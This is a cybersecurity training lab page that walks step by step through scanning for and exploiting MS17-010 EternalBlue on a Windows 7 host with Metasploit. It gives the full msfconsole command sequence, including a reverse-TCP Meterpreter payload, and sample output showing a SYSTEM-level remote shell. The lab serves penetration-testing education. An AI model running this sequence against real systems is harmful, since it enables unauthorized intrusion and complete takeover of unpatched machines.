LabEx
Log InJoin Free

Exploit MS17-010 EternalBlue on a Windows 7 Target in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

MS17-010, publicly known as EternalBlue, is a critical vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability allows remote attackers to execute arbitrary code on affected systems. The Metasploit Framework is a powerful open-source tool for developing, testing, and executing exploit code.

In this lab, you will step into the role of a penetration tester. You will use the Metasploit Framework to first identify a vulnerable Windows 7 machine on the network using a scanner module. Then, you will configure and launch the EternalBlue exploit against the target to gain full remote control through a Meterpreter session. This hands-on experience will demonstrate the real-world impact of unpatched vulnerabilities.

For the purpose of this lab, a vulnerable Windows 7 machine is present on the network at the IP address 192.168.1.101.

Use the auxiliary/scanner/smb/smb_ms17_010 scanner to find targets

In this step, you will begin by launching the Metasploit console and using a specialized scanner module to confirm that our target is vulnerable to MS17-010. This is a crucial reconnaissance phase in any penetration test.

First, open a terminal and start the Metasploit Framework console by running the msfconsole command. This may take a moment to load.

msfconsole

Once the console is loaded, you will see the Metasploit command prompt (msf6 >). Now, use the use command to select the MS17-010 scanner module.

use auxiliary/scanner/smb/smb_ms17_010

Next, you need to tell the scanner which hosts to check. View the available options for this module with the show options command.

show options

You will see a list of options. The RHOSTS option is required, which specifies the remote host(s) to scan. Set this to the IP address of our target Windows 7 machine.

set RHOSTS 192.168.1.101

With the target set, execute the scanner by typing run.

run

Metasploit will now scan the target. If the host is vulnerable, you will see a confirmation message in the output.

[+] 192.168.1.101:445   - Host is likely VULNERABLE to MS17-010! (OS: Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.1.101:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This output confirms that the target at 192.168.1.101 is vulnerable and a good candidate for our exploit.

Select the exploit/windows/smb/ms17_010_eternalblue exploit

In this step, with the target confirmed as vulnerable, you will select the corresponding exploit module in Metasploit. The ms17_010_eternalblue module is designed to exploit this specific vulnerability.

Within the Metasploit console, use the use command again, but this time to load the exploit module.

use exploit/windows/smb/ms17_010_eternalblue

After executing the command, you will notice that your command prompt changes to reflect the context of the newly selected exploit module. This indicates that you are now working within the configuration space for the EternalBlue exploit.

msf6 exploit(windows/smb/ms17_010_eternalblue) >

This module contains the code that will be sent to the target machine to leverage the SMB vulnerability and allow you to execute further commands.

Set the RHOSTS option to the vulnerable Windows 7 target

In this step, you will configure the exploit module to target the specific IP address of the vulnerable machine. While the scanner could check a range of IPs, the exploit must be directed at a single, confirmed target.

Just like with the scanner module, you can view the configuration options for the exploit using the show options command.

show options

You will see that this module also has an RHOSTS option, which stands for "Remote Hosts". It is currently blank. You must set this to the IP address of your Windows 7 target, which you confirmed in the first step.

Use the set command to assign the IP address 192.168.1.101 to RHOSTS.

set RHOSTS 192.168.1.101

Metasploit will confirm the change.

RHOSTS => 192.168.1.101

Now the exploit knows exactly where to direct the attack.

Set the windows/x64/meterpreter/reverse_tcp payload

In this step, you will choose a payload. A payload is the code that will run on the target system after the exploit successfully compromises it. For this lab, you will use Meterpreter, an advanced, dynamically extensible payload.

The windows/x64/meterpreter/reverse_tcp payload is an excellent choice. It creates a connection from the target machine back to you (a "reverse" shell), which is often successful at bypassing firewalls. It is also designed for 64-bit Windows systems.

Use the set payload command to select it.

set payload windows/x64/meterpreter/reverse_tcp

Metasploit will confirm the payload has been set.

payload => windows/x64/meterpreter/reverse_tcp

Although Metasploit often selects a default payload, explicitly setting it ensures you are using the one best suited for your goal. You can run show options again to see the options for both the exploit and the payload. You will notice new options like LHOST (Listening Host) and LPORT (Listening Port), which Metasploit typically configures automatically to your machine's IP address.

Execute the exploit and establish a Meterpreter session

In this step, with all options configured, you will launch the exploit and take control of the target machine.

All the preparation is done. The exploit is selected, the target is set, and the payload is chosen. To launch the attack, simply use the exploit command.

exploit

Metasploit will now attempt to exploit the vulnerability on the target. You will see several status messages as it works. If successful, the exploit will deliver the Meterpreter payload, and you will see a message indicating a "WIN!" and that a new session has been opened.

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400

meterpreter >

The meterpreter > prompt signifies success! You now have a remote shell on the victim machine. To prove your control, run the getuid command to see what user account you are running as.

getuid

The output should be:

Server username: NT AUTHORITY\SYSTEM

NT AUTHORITY\SYSTEM is the highest level of privilege on a Windows system. You have successfully compromised the target. You can also run sysinfo to get system information.

sysinfo

Computer        : WIN7-VICTIM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

Congratulations, you have successfully exploited MS17-010.

Summary

In this lab, you gained practical, hands-on experience with one of the most well-known vulnerabilities using the Metasploit Framework.

You successfully:

  • Used an auxiliary scanner module to identify a host vulnerable to MS17-010.
  • Selected and configured the ms17_010_eternalblue exploit module.
  • Set a powerful meterpreter payload to establish a remote connection.
  • Executed the exploit and gained a SYSTEM-level Meterpreter session on the target Windows 7 machine.

This exercise highlights the critical importance of timely security patching for operating systems. A single, unpatched vulnerability can be enough for an attacker to gain complete control over a system.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux